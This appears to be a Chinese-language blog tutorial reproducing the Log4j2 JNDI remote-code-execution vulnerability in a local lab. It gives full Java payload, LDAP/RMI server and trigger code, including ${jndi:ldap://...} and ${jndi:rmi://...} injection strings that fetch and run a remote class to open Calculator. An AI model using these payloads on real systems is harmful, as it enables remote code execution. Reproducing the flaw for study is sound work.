背景
Apache Log4j2是一个基于Java的日志记录工具,该工具重写了Log4j框架,并且引入了大量丰富的特性,Apache log4j-2是Log4j的升级版,这个日志框架被大量用于业务系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中,而攻击者则可以利用此特性通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
本文章主要是处于个人兴趣想去复现一下 Log4j2的漏洞,事先声明本人对安全领域一窍不通,只是之前碰巧读过部分 Log4j 的代码,所以有兴趣研究下这个问题的根源,当然这篇文章只是告诉大家怎么去复现这个问题。关于 Log4j2部分的源码得等下篇文章了。
环境介绍
- 操作系统:macOS Catalina
- java version "1.8.0_191"
- LDAP服务端
- python3.x
- 手写 RMI 服务端以及测试代码。
LDAP 方式复现
- 1.手写hack 代码用于启动mac 系统的计算器 java 代码,编译成class 文件。
- 2.在 class 目录通过 python3 -m http.server 启动服务后能够通过 http 协议访到 hack 的 class 文件。
- 3.通过marshalsec启动一个 LDAP 服务器,代码开源可以手动各种操作,编译成 jar 包参考LDAP服务端。
- 4.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。
public class BugFinder {
public BugFinder() {
try {
System.out.println("执行漏洞代码");
String[] commands = {"open", "/System/Applications/Calculator.app"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
System.out.println("完成执行漏洞代码");
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
BugFinder bugFinder = new BugFinder();
}
}- hack 的代码负责启动mac系统的计算器。
python3 -m http.server 8000
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#BugFinder"- 在 hack 的class文件所在目录通 python3启动http服务暴露 hack 的 class 文件。
- 通过marshalsec的开源软件启动 LDAP 服务,参考LDAP服务端。
package com.bug;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class BugTester {
private static final Logger logger = LogManager.getLogger(BugTester.class);
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
logger.error("${jndi:ldap://192.168.0.3:1389/BugFinder}");
try {
Thread.sleep(1000);
} catch (Exception e) {
}
}
}- 通过 log4j2的打印日志${jndi:ldap://192.168.0.3:1389/BugFinder}唤起本地计算器。
- 不同的 JDK 对于com.sun.jndi.ldap.object.trustURLCodebase的默认值不一样,所以为了测试统一设置成true 便于触发。
- 不同的 JDK 版本的默认值可能导致这个 bug 不会被触发。
RMI 方式复现
- 1.手写hack 代码用于启动mac 系统的计算器 java 代码,编译成class 文件。
- 2.手写 RMI 的服务端代码。
- 3.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。
package com.bug;
public class BugFinder {
public BugFinder() {
try {
System.out.println("执行漏洞代码");
String[] commands = {"open", "/System/Applications/Calculator.app"};
Process pc = Runtime.getRuntime().exec(commands);
pc.waitFor();
System.out.println("完成执行漏洞代码");
} catch (Exception e) {
e.printStackTrace();
}
}
public static void main(String[] args) {
BugFinder bugFinder = new BugFinder();
}
}- hack 的代码负责启动mac系统的计算器。
package com.bug;
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class RMIServer {
public static void main(String[] args) {
try {
LocateRegistry.createRegistry(1099);
Registry registry = LocateRegistry.getRegistry();
Reference reference = new Reference("com.bug.BugFinder",
"com.bug.BugFinder", null);
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("BugFinder", referenceWrapper);
} catch (Exception e) {
e.printStackTrace();
}
}
}- RMI 的服务端代码,启动1099端口进行监听。对应 log4j2的日志通过"jndi:rmi://192.168.0.3:1099/BugFinder"进行访问呢。
- Reference的参数com.bug.BugFinder就是 hack 代码的class 路径。
public class BugTester {
private static final Logger logger = LogManager.getLogger(BugTester.class);
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
logger.error("${jndi:rmi://192.168.0.3:1099/BugFinder}");
try {
Thread.sleep(1000);
} catch (Exception e) {
}
}
}- 执行 log4j2的 error 日志,参数为${jndi:rmi://192.168.0.3:1099/BugFinder},会触发mac 系统打开计算器。